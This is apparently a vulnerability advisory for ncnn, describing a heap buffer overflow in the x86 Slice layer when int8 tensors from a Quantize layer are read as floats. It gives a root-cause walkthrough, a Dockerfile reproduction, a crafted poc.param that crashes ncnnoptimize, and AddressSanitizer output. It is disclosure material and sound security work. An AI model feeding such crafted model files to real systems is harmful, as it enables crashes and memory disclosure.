Heap Buffer Overflow in x86 Slice
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/slice_x86.cpp:377 in Slice_x86::forward
Sanitizer verdict: heap-buffer-overflow
Summary
The x86 Slice layer diverts only 16-bit tensors to a separate implementation, so an 8-bit tensor — for example the output of a Quantize layer — is processed by the fp32 code and reinterpreted through const float*. When the declared slice lengths produce outputs with different packing (-23300=2,4,3 on axis 0 gives elempack 4 and 1), the unpacking branch strides one "row" per w floats and reads roughly four times past the end of the int8 source tensor. ncnnoptimize triggers this while running ModelWriter::shape_inference() on the attacker-supplied .param file.
Detail
Slice_x86::forward starts with if (bottom_blob.elembits() == 16) return forward_bf16s_fp16s(bottom_blobs, top_blobs, opt); — the only element-width dispatch in the function. An elembits() == 8 tensor falls straight through into code that assumes 4-byte elements. The PoC places a Quantize layer in front of the Slice, so bottom_blob is a 10x7 int8 Mat with elemsize = 1.
// src/layer/x86/slice_x86.cpp:170
const float* ptr = bottom_blob_unpacked;
for (size_t i = 0; i < top_blobs.size(); i++)
{
Mat& top_blob = top_blobs[i];
// src/layer/x86/slice_x86.cpp:364
if (out_elempack == 1 && top_blob.elempack == 4)
{
for (int j = 0; j < top_blob.h; j++)
{
const float* r0 = ptr;
const float* r1 = ptr + w;
const float* r2 = ptr + w * 2;
const float* r3 = ptr + w * 3;
float* outptr0 = top_blob.row(j);
for (int j = 0; j < w; j++)
{
outptr0[0] = *r0++;
outptr0[1] = *r1++;
outptr0[2] = *r2++;
outptr0[3] = *r3++;
The slice lengths come from parameter 0 (-23300=2,4,3). At line 136 the first length, 4, selects out_elempack = 4 while the second, 3, selects 1; lines 154-160 then take the minimum, 1, and because the int8 input already has elempack == 1 no convert_packing occurs. The first output therefore keeps elempack == 4 while the shared out_elempack is 1, which is exactly the condition at line 364.
Inside that branch ptr is the int8 buffer read as floats and w is 10, so r1, r2 and r3 are offset by 40, 80 and 120 bytes into a tensor whose payload is 70 bytes. Quantize allocated it through Mat::create(10, 7, 1u, 1), giving cstep = alignSize(70, 16) = 80 bytes of payload plus a 4-byte refcount and the 64-byte NCNN_MALLOC_OVERREAD pad, 148 bytes in total. The inner loop runs j = 0..9 over r3, so its eighth read touches byte 148 — the first address outside the allocation and the fault ASan reports at line 380.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-x86-slice && cd ncnn-poc-heap-buffer-overflow-in-x86-slice
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'EOF'
7767517
3 4
Input data 0 1 data 0=10 1=7
Quantize quant 1 1 data quant
Slice slice 1 2 quant out0 out1 -23300=2,4,3
EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x511000000494 at pc 0x5768987b10b6 bp 0x7ffceaa81b80 sp 0x7ffceaa81b70
READ of size 4 at 0x511000000494 thread T0
#0 0x5768987b10b5 in ncnn::Slice_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/slice_x86_avx512.cpp:380
#1 0x576894d7470b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#2 0x576894d5cb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#3 0x576894dbc9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#4 0x576894c4e3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#5 0x576894ccbeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#6 0x7ad1efc471c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x7ad1efc4728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x576894c4b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x511000000494 is located 0 bytes after 148-byte region [0x511000000400,0x511000000494)
allocated by thread T0 here:
#0 0x7ad1f02c0f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x576894ce068e in fastMalloc /ncnn/src/allocator.h:62
#2 0x576894ce068e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x576894d1f4b8 in ncnn::Mat::create(int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:539
#4 0x57689a63e391 in ncnn::Quantize_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/quantize_x86_avx512.cpp:342
#5 0x576894d6af2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#6 0x576894d5cb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#7 0x576894dbc9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#8 0x576894c4e3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#9 0x576894ccbeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#10 0x7ad1efc471c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x7ad1efc4728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x576894c4b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/build/src/layer/x86/slice_x86_avx512.cpp:380 in ncnn::Slice_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const
Credit
Zheng Yu @ DepthFirst